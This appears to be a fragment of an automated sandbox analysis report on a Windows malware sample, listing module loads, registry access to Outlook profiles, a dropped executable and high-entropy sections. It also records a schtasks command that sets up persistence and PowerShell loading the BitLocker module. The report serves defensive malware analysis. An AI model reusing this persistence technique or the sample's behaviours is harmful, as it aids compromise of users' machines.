                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: kAsh3nmsgs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: kAsh3nmsgs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: kAsh3nmsgs.exeStatic PE information: 0xCC1F1A8D [Sat Jul 9 11:07:57 2078 UTC]
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_09D53D8B push 69CC4589h; ret 0_2_09D53D96
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_09D53C0B push 69CC4589h; ret 0_2_09D53C1B
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_09D536A0 pushfd ; iretd 0_2_09D536A1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A0426AB pushfd ; retf 0_2_0A0426AD
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_06A17670 push esp; iretd 8_2_06A17679
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_06A1B200 push es; ret 8_2_06A1B210
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_06A17C24 push esp; iretd 8_2_06A17C2D
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_09883DCF push 69C44589h; ret 9_2_09883DD4
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0988F54B push ecx; iretd 9_2_0988F54C
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_098836A0 pushfd ; iretd 9_2_098836A1
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2D26A8 pushfd ; retf 9_2_0B2D26AD
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA7E3A push esi; iretd 13_2_06CA7E3B
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA2C92 pushad ; ret 13_2_06CA2C93
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA2AAC push esp; ret 13_2_06CA2AAD
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA2A52 push esp; ret 13_2_06CA2A53
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA28E8 push eax; ret 13_2_06CA28E9
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CAF9B0 pushad ; ret 13_2_06CAF9B1
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06D97670 push esp; iretd 13_2_06D97679
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06D97C24 push esp; iretd 13_2_06D97C2D
                      Source: kAsh3nmsgs.exeStatic PE information: section name: .text entropy: 7.744400724877213
                      Source: HHhSyZN.exe.0.drStatic PE information: section name: .text entropy: 7.744400724877213
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeFile created: C:\Users\user\AppData\Roaming\HHhSyZN.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
